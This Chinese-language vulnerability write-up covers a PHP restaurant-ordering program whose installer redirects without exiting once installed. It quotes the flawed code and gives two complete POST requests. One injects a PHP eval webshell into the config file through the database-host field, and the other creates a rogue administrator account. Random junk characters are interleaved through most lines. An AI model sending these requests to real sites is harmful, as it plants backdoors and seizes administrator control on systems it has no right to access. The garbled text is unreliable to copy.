问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。6 } f4 J# v2 m$ d$ X5 ?: E
1 O6 a6 N3 n6 _1 M
<?php$ S7 ]+ A! k4 B/ m7 q
if(file_exists("../install.lock"))4 t9 ~: U: {" ~! ^, p+ h
{
" o; W; Z0 h p r# K, @6 x# z header("Location: ../");//没有退出, F2 M7 T3 @& G2 k& U* R
}9 [- Q1 v5 a! ]5 l7 q+ [7 s+ H8 k
t9 e9 ^4 s$ C//echo 'tst';exit;& z k' f6 x# i) {: X' @# R i
require_once("init.php");
9 v: {8 d% I6 v7 \- n4 ?8 |if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
+ E+ E' d# f. G) ^9 Z* O{1 k) K" M& { j, {5 E8 }
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
+ Z0 w3 k. ?3 _/ r9 a9 V! U! ]$ ^& i) I1 P; ]+ ]
1、getshell(很危险)
6 b: V. R6 V* b9 Q6 i% ^# Xif(empty($_REQUEST['step']) || $_REQUEST['step']==1)8 ?4 p5 D K- K9 m% k7 L+ ^
{
- ~. W/ Q2 ~6 X' j% P$smarty->assign("step",1);
/ G, I& b! h X4 x& y. u. t: z$smarty->display("index.html");- G: I$ t, r* G# B9 [0 b
}elseif($_REQUEST['step']==2)
1 I0 T" w4 J8 a9 _# z4 w4 m{: M8 d: i! Y ?' D2 C1 V$ r' E
$mysql_host=trim($_POST['mysql_host']);( A+ x4 u7 M7 F
$mysql_user=trim($_POST['mysql_user']);
* ^2 b, t o1 ~ $mysql_pwd=trim($_POST['mysql_pwd']);" H1 B2 w$ Y7 w% z1 M. r
$mysql_db=trim($_POST['mysql_db']);
4 {* ?/ p$ _5 u9 D! k $tblpre=trim($_POST['tblpre']);. n0 T$ G1 V/ B7 A# X# B
$domain==trim($_POST['domain']);. m% D5 k; y8 [2 ^% @
$str="<?php \r\n";
$ I' D* {$ a8 |& x; I# P $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
1 P E3 M" i1 C: O $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";% n! l' S& k9 P/ R, n
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";# y u- W5 j' e+ x
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
- ?& U* S+ J2 i7 u8 Z! P; E $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
4 c" u# K- U% q8 g. ~/ e $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
7 c7 H! ]$ P, m4 P$ e) g $str.='define("DOMAIN","'.$domain.'");'."\r\n";
8 t6 \* K. i* C; o5 [5 A: L $str.='define("SKINS","default");'."\r\n";
0 b5 }: Q3 |; p6 j( b& {! } $str.='?>';1 s: z/ G( w; X
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
5 E6 V: M# _$ N8 X上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
. |$ k8 j! \& h' x& d6 m# {- o; `POST /canting/install/index.php?m=index&step=2 HTTP/1.1
. X2 q2 t/ K. `& XHost: 192.168.80.129
1 d# u1 N( x$ W6 m8 _User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.00 n1 c0 f- ~2 d2 Q% z9 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
9 ]2 w3 p* T2 p0 R6 T9 C. i8 I, ?Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3; ?! A- ?& e2 V0 _
Accept-Encoding: gzip, deflate& @8 [# u5 V4 J! g
Referer: http://192.168.80.129/canting/install/index.php?step=1" {/ I1 Y( \/ M( c
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42. r8 }* a0 b* X g, o7 L- `5 Y
Content-Type: application/x-www-form-urlencoded5 o6 H3 ]/ _ l. q* l" J- j
Content-Length: 126% [) P% e6 K0 N/ B
2 J. C5 U( W cmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD2 ^2 @7 J( n' C- w! b# h9 H/ E- j
但是这个方法很危险,将导致网站无法运行。5 `- @ O" S. r8 S: B
0 z( T! O5 h2 y( K9 J2、直接添加管理员4 J* O `# T0 I
# h3 O: C' m' a; Gelseif($_REQUEST['step']==5)
4 w$ _% F6 p3 B* w- t0 M6 \% F{
" L% c( T0 I1 d! @$ q( X$ r @ if($_POST)
& [7 ^8 e1 a" X6 E6 s, ^( e' M { require_once("../config/config.inc.php");
6 r8 O1 M) ?/ O) ] M4 E/ d $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);' @; b: c" r9 \$ |
mysql_select_db(MYSQL_DB,$link);8 L, Q9 b2 y" e5 H, j6 `+ M& O
mysql_query("SET NAMES ".MYSQL_CHARSET );
- t# l& c+ Y* K! I& B9 Y mysql_query("SET sql_mode=''");
/ v( N$ p! ?$ E" e. Y7 o5 c
! r z1 N2 C! d8 F* V $adminname=trim($_POST['adminname']);/ q) f5 b7 [- E, v" W7 p/ W5 \
$pwd1=trim($_POST['pwd1']);, R+ [/ m, i' I4 U
$pwd2=trim($_POST['pwd2']);- i5 A( ]- j$ k
if(empty($adminname))) d4 v. o& ^) Y" R) O
{7 [! C( U& z' H- L/ c/ z
1 g" K/ f; g. [0 P+ }: P echo "<script>alert('管理员不能为空');history.go(-1);</script>";* Q B3 C* \" W7 g- C. j; n
exit();
5 q; n0 Q2 O$ z+ k5 L5 n4 M3 z1 x }6 g) g& s: q+ ]- t' G
if(($pwd1!=$pwd2) or empty($pwd1))5 u/ a$ l6 X4 }* w0 T* V; }( V( V
{
' N: N9 K- i1 o! i* p" ~ echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出5 }2 o, C# q# ~; Q8 k$ X" ^- ]
}
; `4 p2 i) [( F6 D8 B mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
. t {1 u9 Z- T+ F; a }
# p( |- C9 k" i; ]9 U; z- h这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:: V+ C5 \; k) [5 N+ q z/ H0 w
POST /canting/install/index.php?m=index&step=5 HTTP/1.1. x* @ _$ u. [$ |( h
Host: 192.168.80.129
* r: B6 S7 x4 e G+ [User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
' i( K% M- o% m) T) hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
( I: T: E/ g0 A4 r$ f! n) HAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
9 y9 @5 O" ?1 N1 N) {/ a5 gAccept-Encoding: gzip, deflate
/ o$ p$ @& b3 j* j7 k9 C5 T4 Y0 mReferer: http://www.2cto.com /canting/install/index.php?step=1
' Z) `+ ?$ K4 W C5 N Y8 j5 b& kCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc423 N% S& i2 H( r+ i
Content-Type: application/x-www-form-urlencoded
. D8 V( b+ i8 _5 ^- t* fContent-Length: 46
1 D; `9 Z* y7 d; t N; P. Y, B3 T
, M: w- G [( l' }5 hadminname=qingshen&pwd1=qingshen&pwd2=qingshen
4 Y: d- g: j6 g3 r8 ^ |